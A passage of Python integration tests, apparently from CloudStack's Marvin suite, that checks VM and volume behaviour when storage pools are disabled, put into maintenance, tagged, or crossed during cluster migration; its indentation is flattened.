5. Resize DATA disk to a higher value
6. Take VM Snapshot of the VM (for supported hypervisors)
7. Destroy the VM and immediately restore the VM
8. Enable a new storage pool
9. Re-install the VM with same template
10. Re-install the VM with the new template created earlier
11. Repeat tests with enabled pool, Attach new Volume to VM2
12. Resize disk to a higher value
13. Reboot the VM
14. Take VM Snapshot of the VM
15. Destroy the VM and immediately restore the VM
"""
# Choose appropriate service offering depending on the scope the test
# is being run on
self.disabled_list = []
if value == 'CLUSTER':
other_scope = 'ZONE'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'ZONE':
other_scope = 'CLUSTER'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'host':
# local storage
other_scope = None
if self.zone.localstorageenabled:
self.service_offering = self.service_offering_local
self.disk_offering = self.disk_offering_local
else:
self.skipTest("Local storage not enabled")
if self.hypervisor.lower() == 'lxc':
self.skipTest("Not running rest of tests in lxc")
# Keep one storage pool active and disable the rest
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=value)
if self.list_storage:
count_st_pools = len(self.list_storage)
else:
count_st_pools = 0
self.disabled_pool_1 = None
if count_st_pools > 1:
self.debug(
'Found % s storage pools, keeping one and disabling rest' %
count_st_pools)
for pool in self.list_storage[1:]:
self.disabled_pool_1 = self.list_storage[1]
if pool.state == 'Up':
self.debug('Trying to disable storage %s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 1:
self.debug(
'Only one % s wide storage found - will not be able to complete all tests' %
value)
else:
self.skipTest('No % s wide storage pools found' % value)
except Exception as e:
raise e
# Disable the other scope storage pools while we are testing on one
# scope - applicable for only shared storage
if value != 'host':
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=other_scope)
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug(
'Trying to disable storage % s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail(
"Couldn't disable storage % s" % pool.id)
else:
self.debug('No % s wide storage pools found' % other_scope)
except Exception as e:
raise e
# Step 1: Deploy a VM and attach data disk to one VM
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
self.volume_1 = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
self.virtual_machine_1.attach_volume(self.userapiclient, self.volume_1)
list_volume = Volume.list(self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_1.id,
            'Check if volume state (attached) is reflected')
self.debug(
'Step 1: volume id:%s successfully attached to vm id%s' %
(self.volume_1.id, self.virtual_machine_1.id))
# Step 2: Disable the storage pool
self.storage_pools_list = StoragePool.list(
self.userapiclient, scope=value, state='Up')
self.storage_pool_1 = self.storage_pools_list[0]
try:
self.debug(
'Step 2: Disabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=False)
self.disabled_list.append(self.storage_pool_1.id)
except Exception as e:
self.debug("Step 2: Couldn't disable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Disabled')
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
# Step 3: Create Template from root volume of the VM
root_volume_1 = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
self.virtual_machine_1.stop(self.userapiclient)
try:
template_2 = Template.create(self.userapiclient,
self.testdata['template_2'],
volumeid=root_volume_1.id,
account=self.account.name,
domainid=self.account.domainid)
self.cleanup.append(template_2)
self.debug('Step 3: Created template with ID: %s' % template_2.id)
list_template = Template.list(
self.userapiclient,
templatefilter='self',
id=template_2.id)
except Exception as e:
self.fail('Step 3: Template from volume failed')
# Step 4: Attach a new volume - should fail
self.volume_2 = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
self.debug(
'Step 4: Trying to attach new volume to VM on disabled storage - should fail')
with self.assertRaises(Exception):
self.virtual_machine_1.attach_volume(
self.userapiclient, self.volume_2)
# Step 5: Resize DATA disk to a higher value for attached disk
try:
self.volume_1.resize(self.userapiclient,
diskofferingid=self.resized_disk_offering.id)
list_volume_1 = Volume.list(
self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume_1[0].diskofferingid,
self.resized_disk_offering.id,
'check list volume response for volume id: %s' %
self.volume_1.id)
self.debug(
'Step 5: volume id %s got resized successfully' %
list_volume_1[0].id)
except Exception as e:
self.fail('Step 5: Volume resize on disabled pool failed: % s' % e)
# Step 6: Take VM Snapshot
if self.hypervisor.lower() not in ('kvm', 'hyperv', 'lxc'):
try:
self.debug(
"Step 6: Taking VM Snapshot for vm id % s" %
self.virtual_machine_1.id)
vm_snapshot = VmSnapshot.create(self.userapiclient,
self.virtual_machine_1.id,
'false',
'TestSnapshot',
'Display Text')
self.assertEqual(
vm_snapshot.state,
'Ready',
'Check VM snapshot is ready')
except Exception as e:
self.fail(
'Step 6: VM Snapshot on disabled pool failed: % s' %
e)
if vm_snapshot:
self.debug('Step 6: Deleting Vm Snapshot')
VmSnapshot.deleteVMSnapshot(self.userapiclient, vm_snapshot.id)
# Step 7: Destroy VM and immediately restore the VM
self.debug(
"Step 7: Deleting and restoring the VM, should continue to run from same storage pool")
self.virtual_machine_1.delete(self.userapiclient, expunge=False)
self.virtual_machine_1.recover(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
verify_vm_storage_pool(
self,
self.virtual_machine_1.id,
self.storage_pool_1.id)
# Step 8: Enable new pool
if self.disabled_pool_1:
try:
newpoolid = self.disabled_pool_1.id
StoragePool.update(
self.userapiclient, id=newpoolid, enabled=True)
self.debug("Step 8: Enabling new pool % s " % newpoolid)
if newpoolid in self.disabled_list:
self.disabled_list.remove(newpoolid)
except Exception as e:
                self.fail('Step 8: Enabling storage pool failed: %s' % e)
else:
self.debug(
'Step 8: Could not find a second storage pool, so enabling the first storage pool and running the tests')
try:
self.debug(
'Step 8: Enabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=True)
if self.storage_pool_1.id in self.disabled_list:
self.disabled_list.remove(self.storage_pool_1.id)
newpoolid = self.storage_pool_1.id
except Exception as e:
self.fail("Step 8: Couldn't enable pool %s" % e)
verify_pool_state(self, newpoolid, 'Up')
# Step 9: Re-install the VM with same template
if value != 'host':
self.debug("Step 9: Re-installing VM 1")
vm_restore = self.virtual_machine_1.restore(
self.userapiclient, templateid=self.template.id)
verify_vm_storage_pool(self, self.virtual_machine_1.id, newpoolid)
# Step 10 : Re-install VM with different template
self.debug("Step 10: re-installing VM with different template")
vm_restore = self.virtual_machine_1.restore(
self.userapiclient, templateid=template_2.id)
verify_vm_storage_pool(self, self.virtual_machine_1.id, newpoolid)
# Step 11: Repeat tests with enabled pool. Start with attach VM
if value != 'host':
self.debug("Step 11: Attach volume to VM")
self.virtual_machine_1.attach_volume(
self.userapiclient, self.volume_2)
list_volume_2 = Volume.list(
self.userapiclient, id=self.volume_2.id)
self.assertEqual(list_volume_2[0].virtualmachineid,
self.virtual_machine_1.id,
'Check if volume state (attached) is reflected')
self.debug(
'Step 11: volume id:% s successfully attached to vm id % s' %
(self.volume_2.id, self.virtual_machine_1.id))
# Step 12: Re-size Volume to higher disk offering
try:
self.virtual_machine_1.stop(self.userapiclient)
self.volume_2.resize(
self.userapiclient,
diskofferingid=self.resized_disk_offering.id)
list_volume_2 = Volume.list(
self.userapiclient, id=self.volume_2.id)
self.assertEqual(
list_volume_2[0].diskofferingid,
self.resized_disk_offering.id,
'check list volume response for volume id: %s' %
self.volume_2.id)
self.debug(
'Step 12: volume id %s got resized successfully' %
list_volume_2[0].id)
except Exception as e:
self.fail('Step 12: Failed to resize volume % s ' % e)
self.virtual_machine_1.start(self.userapiclient)
# Step 13: Reboot VM
self.virtual_machine_1.reboot(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
# Step 14: Take Snapshot of VM
if self.hypervisor.lower() not in ('kvm', 'hyperv', 'lxc'):
try:
vm_snapshot = VmSnapshot.create(
self.userapiclient,
self.virtual_machine_1.id,
'false',
'TestSnapshot2',
'Display Text')
self.assertEqual(
vm_snapshot.state,
'Ready',
'Check the snapshot of vm is ready!')
except Exception as e:
self.fail(
'Step 14: Snapshot failed post enabling new storage pool')
# Step 15: Delete and recover VM
self.debug("Step 15: Deleting and recovering VM")
self.virtual_machine_1.delete(self.userapiclient, expunge=False)
self.virtual_machine_1.recover(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
@ddt
class TestPathDisableStorage_Maint_Tags(cloudstackTestCase):
"""
    # Tests in this path are required to be run independently
    # (not in parallel with any other tests, since they involve disabling/enabling storage pools
    # and may cause unexpected failures in other tests).
    # The tests also require 2 cluster-wide and 2 zone-wide storage pools to be available in the setup.
    # For running the tests on local storage, ensure there are 2 local storage pools set up on each host or on different hosts.
"""
@classmethod
def setUpClass(cls):
testClient = super(
TestPathDisableStorage_Maint_Tags,
cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.testdata = testClient.getParsedTestDataConfig()
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient)
cls.testdata['mode'] = cls.zone.networktype
cls.template = get_template(
cls.apiclient,
cls.zone.id,
cls.testdata['ostype'])
        if cls.template == FAILED:
            cls.fail(
                'get_template() failed to return template with description %s' %
                cls.testdata['ostype'])
        cls.testdata['template']['ostypeid'] = cls.template.ostypeid
cls._cleanup = []
cls.disabled_list = []
cls.maint_list = []
cls.testdata['template_2']['zoneid'] = cls.zone.id
cls.testdata['template_2']['ostypeid'] = cls.template.ostypeid
cls.hypervisor = testClient.getHypervisorInfo()
try:
cls.account = Account.create(cls.apiclient,
cls.testdata['account'],
admin=True)
cls.debug('Creating account')
cls._cleanup.append(cls.account)
# Create shared storage offerings
cls.service_offering_shared = ServiceOffering.create(
cls.apiclient, cls.testdata['service_offering'])
cls._cleanup.append(cls.service_offering_shared)
cls.disk_offering_shared = DiskOffering.create(
cls.apiclient, cls.testdata['disk_offering'])
cls.resized_disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['resized_disk_offering'])
cls._cleanup.append(cls.disk_offering_shared)
# Create offerings for local storage if local storage is enabled
if cls.zone.localstorageenabled:
cls.testdata["service_offerings"][
"tiny"]["storagetype"] = 'local'
cls.debug("Creating local storage offering")
cls.service_offering_local = ServiceOffering.create(
cls.apiclient, cls.testdata["service_offerings"]["tiny"])
cls._cleanup.append(cls.service_offering_local)
cls.testdata["disk_offering"]["storagetype"] = 'local'
cls.debug("Creating local storage disk offering")
cls.disk_offering_local = DiskOffering.create(
cls.apiclient, cls.testdata["disk_offering"])
cls._cleanup.append(cls.disk_offering_local)
cls.testdata["disk_offering"]["storagetype"] = ' '
cls.testdata["service_offerings"]["tiny"]["storagetype"] = ' '
else:
cls.debug("No local storage found")
cls.userapiclient = testClient.getUserApiClient(
UserName=cls.account.name, DomainName=cls.account.domain)
response = User.login(cls.userapiclient,
username=cls.account.name,
password=cls.testdata['account']['password'])
assert response.sessionkey is not None
except Exception as e:
cls.tearDownClass()
raise e
@classmethod
def tearDownClass(cls):
try:
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception('Warning:Exception during cleanup: %s' % e)
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
def tearDown(self):
if self.disabled_list:
for poolid in self.disabled_list:
if StoragePool.list(self.userapiclient, id=poolid)[0].state == 'Disabled':
try:
StoragePool.update(
self.userapiclient, id=poolid, enabled=True)
self.debug('Enabling: % s ' % poolid)
except Exception as e:
self.fail("Couldn't enable storage % s" % id)
if self.maint_list:
for poolid in self.maint_list:
if StoragePool.list(self.userapiclient, id=poolid)[0].state == 'Maintenance':
try:
StoragePool.cancelMaintenance(
self.userapiclient, id=poolid)
self.debug(
'Cancelled Maintenance mode for % s' %
poolid)
except Exception as e:
self.fail(
"Couldn't cancel Maintenance mode for storage % s " %
poolid)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.fail('Warning: Exception during cleanup : %s' % e)
@data('host', 'CLUSTER', 'ZONE')
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_01_maint_capacity_tags(self, value):
"""
Test Steps:
========
1. Deploy VM
2. Add storage to maintenance
3. Cancel Maintenance
4. Disable pool and then Start the VM - verify it runs off the same pool
5. Perform more VM operations - reboot
6. Add tags to pool
7. Create tagged offering with same tags
8. Enable pool
9. Deploy VM using the tagged offering
10. Disable storage pool again
11. Calculate current capacity used so far for the storage pool
12. Delete VM and check capacity is re-calculated in the disabled pool
13. Perform VM deploy - should fail since pool is disabled
14. Re-calculate Capacity, should not be altered
"""
# Choose appropriate service offering depending on the scope the test
# is being run on
self.disabled_list = []
if value == 'CLUSTER':
other_scope = 'ZONE'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'ZONE':
other_scope = 'CLUSTER'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'host':
# local storage
if self.zone.localstorageenabled:
other_scope = None
self.service_offering = self.service_offering_local
self.disk_offering = self.disk_offering_local
else:
self.skipTest("Local storage not enabled")
# Keep 2 storage pools active and disable the rest. If only one storage
# pool is present, then skip the test
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=value)
count_st_pools = len(self.list_storage)
if count_st_pools <= 1:
raise unittest.SkipTest(
'Found 1 or fewer storage pools in %s wide scope - cannot proceed' %
value)
elif count_st_pools > 2:
for pool in self.list_storage[2:]:
if pool.state == 'Up':
self.debug('Trying to disable storage %s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 2:
for pool in self.list_storage:
if pool.state != 'Up':
raise unittest.SkipTest(
'Found storage pool %s not in Up state - cannot proceed' %
pool.id)
except Exception as e:
raise e
# Disable the other scope shared storage pools while we are testing on
# one - applicable for only shared storage
if value != 'host':
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=other_scope)
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug(
'Trying to disable storage % s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail(
"Couldn't disable storage % s" % pool.id)
else:
self.debug('No % s wide storage pools found' % other_scope)
except Exception as e:
raise e
self.debug("Step 1: Deploy VM")
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
# Step 2: Add storage to Maintenance mode
self.debug("Step 2: Adding storage to maintenance mode ")
root_volume = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
list_volume = Volume.list(self.userapiclient, id=root_volume.id)
storage_id = list_volume[0].storageid
try:
StoragePool.enableMaintenance(self.userapiclient, id=storage_id)
self.debug('Step 2: Added %s to Maintenance mode' % storage_id)
self.maint_list.append(storage_id)
except Exception as e:
self.fail(
'Step 2: Failed to add Storage pool % s to Maintenance mode' %
storage_id)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
# Step 3: Cancel maintenance mode
try:
StoragePool.cancelMaintenance(self.userapiclient, id=storage_id)
self.debug(
'Step 3: Cancelled Maintenance mode for % s' %
storage_id)
self.maint_list.remove(storage_id)
except Exception as e:
self.fail(
"Step 3: Couldn't cancel Maintenance mode for storage % s " %
storage_id)
# Step 4: Start the VM after disabling pool and verify it's running
# from same pool
try:
self.debug("Step 4: Starting VM after disabling pool")
self.list_storage = StoragePool.list(
self.userapiclient, id=storage_id)
if self.list_storage[0].state == 'Up':
StoragePool.update(
self.userapiclient,
id=storage_id,
enabled=False)
self.debug("Step 4: Disabled pool % s" % storage_id)
self.disabled_list.append(storage_id)
except Exception as e:
raise e
list_vm = list_virtual_machines(
self.userapiclient,
account=self.account.name,
domainid=self.account.domainid,
id=self.virtual_machine_1.id)
vm = list_vm[0]
if vm.state != 'Running':
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
verify_vm_storage_pool(self, self.virtual_machine_1.id, storage_id)
# Step 5: Perform some VM operations - reboot
self.debug(
"Step 5: Performing reboot of VM % s" %
self.virtual_machine_1.id)
self.virtual_machine_1.reboot(self.userapiclient)
verify_vm_storage_pool(self, self.virtual_machine_1.id, storage_id)
# Step 6: Add tags to the storage pool
self.debug("Step 6: Adding tags to storage pool")
StoragePool.update(
self.userapiclient,
id=storage_id,
tags='disable_prov')
# Step 7: Add tagged service offering
self.testdata['service_offerings']['tiny']['tags'] = 'disable_prov'
self.testdata["service_offerings"]["tiny"]["storagetype"] = 'local'
self.tagged_so = ServiceOffering.create(
self.userapiclient, self.testdata['service_offerings'])
self.testdata['service_offerings']['tiny']['tags'] = ' '
self.testdata["service_offerings"]["tiny"]["storagetype"] = ' '
self.cleanup.append(self.tagged_so)
# Step 8: Enable the pool
try:
self.debug("Step 8: Enabling pool")
self.list_storage = StoragePool.list(
self.userapiclient, id=storage_id)
if self.list_storage[0].state == 'Disabled':
StoragePool.update(
self.userapiclient,
id=storage_id,
enabled=True)
self.disabled_list.remove(storage_id)
except Exception as e:
raise e
# Step 9: Deploy VM using the tagged offering
self.debug("Step 9: Deploying VM using tagged offering")
self.virtual_machine_2 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.tagged_so.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_2.id, 'Running')
verify_vm_storage_pool(self, self.virtual_machine_2.id, storage_id)
# Step 10: Disable storage Pool
try:
self.list_storage = StoragePool.list(
self.userapiclient, id=storage_id)
if self.list_storage[0].state == 'Up':
StoragePool.update(
self.userapiclient,
id=storage_id,
enabled=False)
if storage_id not in self.disabled_list:
self.disabled_list.append(storage_id)
except Exception as e:
raise e
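# Capacity type codes used below (assumed CloudStack mapping): 2 = shared primary storage used, 9 = local storage used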
if value != 'host':
capacity_type = 2
else:
capacity_type = 9
# Step 11: View current capacity of storage pool
self.debug("Step 11: Getting current capacity...")
list_capacity_allocated = Capacities.list(
self.userapiclient, fetchlatest='true', type=capacity_type)
capacity_1 = list_capacity_allocated[0].capacityused
self.debug("Capacity 1: % s" % capacity_1)
# Step 12: Delete VM and check capacity is recalculated in disabled
# pool
self.debug("Step 12: Deleting Vm and re-calculating capacity")
self.virtual_machine_2.delete(self.userapiclient)
list_capacity_allocated = Capacities.list(
self.userapiclient, fetchlatest='true', type=capacity_type)
capacity_2 = list_capacity_allocated[0].capacityused
self.debug("Capacity 2: % s" % capacity_2)
self.assertGreater(
capacity_1,
capacity_2,
'Step 12: Capacity used should decrease after the VM is deleted even though the storage pool is disabled')
# Step 13: Deploy new VM with tagged offering again - should fail
with self.assertRaises(Exception):
self.virtual_machine_3 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.tagged_so.id,
zoneid=self.zone.id)
# Step 14: Capacity should not be altered in disabled pool since deploy
# VM failed
self.debug(
"Step 14: Checking capacity is not altered after deploy VM fails")
list_capacity_allocated = Capacities.list(
self.userapiclient, fetchlatest='true', type=capacity_type)
capacity_3 = list_capacity_allocated[0].capacityused
self.assertEqual(
capacity_2,
capacity_3,
"Step 14: Capacity Used shouldn't be altered since VM deployment failed")
class TestPathDisableStorage_Cross_Cluster(cloudstackTestCase):
"""
    # Tests in this path must be run independently (not in parallel with any other tests, \
    since they involve disabling/enabling storage pools and may cause unexpected failures in other tests).
    # This test requires at least 2 clusters in the setup with suitable hosts for migration.
    # For running the tests on local storage, ensure there are 2 local storage pools set up on each host.
"""
@classmethod
def setUpClass(cls):
testClient = super(
TestPathDisableStorage_Cross_Cluster,
cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.testdata = testClient.getParsedTestDataConfig()
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient)
cls.testdata['mode'] = cls.zone.networktype
cls.template = get_template(
cls.apiclient,
cls.zone.id,
cls.testdata['ostype'])
cls.testdata['template']['ostypeid'] = cls.template.ostypeid
if cls.template == FAILED:
cls.fail(
'get_template() failed to return template with description %s' %
cls.testdata['ostype'])
cls._cleanup = []
cls.disabled_list = []
cls.maint_list = []
cls.testdata['template_2']['zoneid'] = cls.zone.id
cls.testdata['template_2']['ostypeid'] = cls.template.ostypeid
cls.hypervisor = testClient.getHypervisorInfo()
try:
cls.account = Account.create(
cls.apiclient, cls.testdata['account'], admin=True)
cls.debug('Creating account')
cls._cleanup.append(cls.account)
cls.service_offering = ServiceOffering.create(
cls.apiclient, cls.testdata['service_offering'])
cls._cleanup.append(cls.service_offering)
cls.disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['disk_offering'])
cls.resized_disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['resized_disk_offering'])
cls._cleanup.append(cls.disk_offering)
cls.userapiclient = testClient.getUserApiClient(
UserName=cls.account.name, DomainName=cls.account.domain)
response = User.login(cls.userapiclient,
username=cls.account.name,
password=cls.testdata['account']['password'])
assert response.sessionkey is not None
except Exception as e:
cls.tearDownClass()
raise e
@classmethod
def tearDownClass(cls):
try:
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception('Warning:Exception during cleanup: %s' % e)
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
def tearDown(self):
if self.disabled_list:
for poolid in self.disabled_list:
if StoragePool.list(self.userapiclient, id=poolid)[
0].state == 'Disabled':
try:
StoragePool.update(
self.userapiclient, id=poolid, enabled=True)
self.debug('Enabling: % s ' % poolid)
except Exception as e:
self.fail("Couldn't enable storage % s" % id)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.fail('Warning: Exception during cleanup : %s' % e)
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_01_cross_cluster_attach_disk(self):
"""
Test Steps:
========
1. Deploy VM in one cluster
2. Migrate to other cluster
3. Add data disk, Attach to VM
4. Disable first storage pool
5. List for migration should not list the first pool anymore
6. Stop VM and detach disk
7. Enable first Pool
8. Migrate root to first pool
9. Now disable first pool again
10. Attach the disk which is running from enabled pool - Should fail
11.Enable pool again
12. Attach disk should now pass
"""
if self.hypervisor.lower() == 'lxc':
self.skipTest("Not running rest of tests in lxc")
cluster_id_list = []
clusters = list_clusters(self.userapiclient, listall='true')
if len(clusters) == 1:
raise unittest.SkipTest('Found only one cluster... skipping test')
for cluster in clusters:
try:
self.debug('Processing for cluster % s ' % cluster.id)
self.list_storage = StoragePool.list(
self.userapiclient, clusterid=cluster.id, scope='CLUSTER')
count_st_pools = len(self.list_storage)
if count_st_pools > 1:
self.debug(
'Found % s storage pools in cluster % s, keeping one and disabling rest' %
(count_st_pools, cluster.id))
for pool in self.list_storage[1:]:
self.disabled_pool_1 = self.list_storage[1]
if pool.state == 'Up':
self.debug(
'Trying to disable storage %s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 1:
self.debug('Only one cluster wide storage found')
else:
self.fail('No cluster wide storage pools found')
except Exception as e:
raise e
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope='ZONE')
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug('Trying to disable storage % s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail("Couldn't disable storage % s" % pool.id)
else:
self.debug('No zone wide storage pools found')
except Exception as e:
raise e
# Step 1: Deploy VM in a cluster
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
root_vol = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
storage_1 = root_vol.storageid
host_1 = self.virtual_machine_1.hostid
self.debug(
"Step 1: VM1 is running on % s host and % s storage pool" %
(host_1, storage_1))
# Step 2: Live Migrate VM to another cluster
hosts_for_migration = Host.listForMigration(
self.userapiclient, virtualmachineid=self.virtual_machine_1.id)
self.debug(
'Step 2: List of hosts suitable for migration: % s ' %
hosts_for_migration)
host_2 = None
for host in hosts_for_migration:
self.debug(
'Step 2: Host Requires storage motion is % s ' %
host.requiresStorageMotion)
if host.requiresStorageMotion:
host_2 = host.id
if host_2:
self.debug(
'Step 2: Migrating VM % s to Host % s' %
(self.virtual_machine_1.id, host_2))
self.virtual_machine_1.migrate_vm_with_volume(
self.userapiclient, hostid=host_2)
else:
self.fail('Step 2: No host found suitable for migration')
# Step 3: Add data disk and attach to VM
self.volume_1 = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
self.virtual_machine_1.attach_volume(self.userapiclient, self.volume_1)
list_volume = Volume.list(self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_1.id,
'Step 3: Check if volume state (attached) is reflected')
self.debug(
'Step 3: volume id:% s successfully attached to vm id % s' %
(self.volume_1.id, self.virtual_machine_1.id))
root_vol = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')[0]
storage_2 = root_vol.storageid
data_vol = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='DATA')[0]
self.debug(
"Step 3: Data Volume is in storage pool: % s" %
data_vol.storageid)
self.assertEqual(
data_vol.storageid,
root_vol.storageid,
"Step 3: Root and Data disk should be running from 2nd storage pool where the VM was live migrated")
# Step 4: Disable first Storage Pool and verify it is not listed in
# hosts suitable for migration
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=False)
self.disabled_list.append(storage_1)
self.debug(
'Step 4: Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail("Step 4: Couldn't disable storage % s" % storage_1)
# Step 5: Disabled pool shouldn't be listed in hostsforMigration since
# all pools in the cluster are disabled
hosts_for_migration = Host.listForMigration(
self.userapiclient, virtualmachineid=self.virtual_machine_1.id)
self.debug(
"Step 5: List of Hosts For Migration is % s" %
hosts_for_migration)
if hosts_for_migration:
for host in hosts_for_migration:
if host_1 == host.id:
self.fail(
"Step 5: All pools in the cluster are disabled, hence host should not be listed for migration")
# Step 6: Stop VM and Detach Disk
self.virtual_machine_1.stop(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
verify_vm_storage_pool(self, self.virtual_machine_1.id, storage_2)
self.debug("Step 6: Stopping VM and detaching disk")
self.virtual_machine_1.detach_volume(
self.userapiclient, volume=self.volume_1)
# Step 7, 8: Enable Pool for Migrating VM and disable again
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=True)
if storage_1 in self.disabled_list:
self.disabled_list.remove(storage_1)
except Exception as e:
self.fail("Step 7: Couldn't enable storage % s" % storage_1)
self.virtual_machine_1.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
try:
self.debug(
'Step 8: Migrating VM % s to Host % s' %
(self.virtual_machine_1.id, host_1))
self.virtual_machine_1.migrate_vm_with_volume(
self.userapiclient, hostid=host_1)
except Exception as e:
self.fail(
"Step 8: Couldn't live migrate VM to host % s due to % s" %
(host_1, e))
# Step 9: disable pool again
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=False)
self.debug("Step 9: Disabling storage pool: % s " % storage_1)
self.disabled_list.append(storage_1)
except Exception as e:
self.fail("Step 9: Couldn't disable storage % s" % storage_1)
st_list = StoragePool.list(self.userapiclient, id=storage_1)
self.debug(
"9.5 Status of storage pool 1 % s is % s " %
(st_list[0].name, st_list[0].state))
# Step 10: Try to attach data disk running from enabled pool with Root
# running in disabled pool - this should fail
with self.assertRaises(Exception):
self.virtual_machine_1.attach_volume(
self.userapiclient, self.volume_1)
self.debug(
"Step 10: Trying to attach volume % s" %
self.volume_1.id)
# Step 11: Enable the pool and try to attach again - this should pass
try:
StoragePool.update(self.userapiclient, id=storage_1, enabled=True)
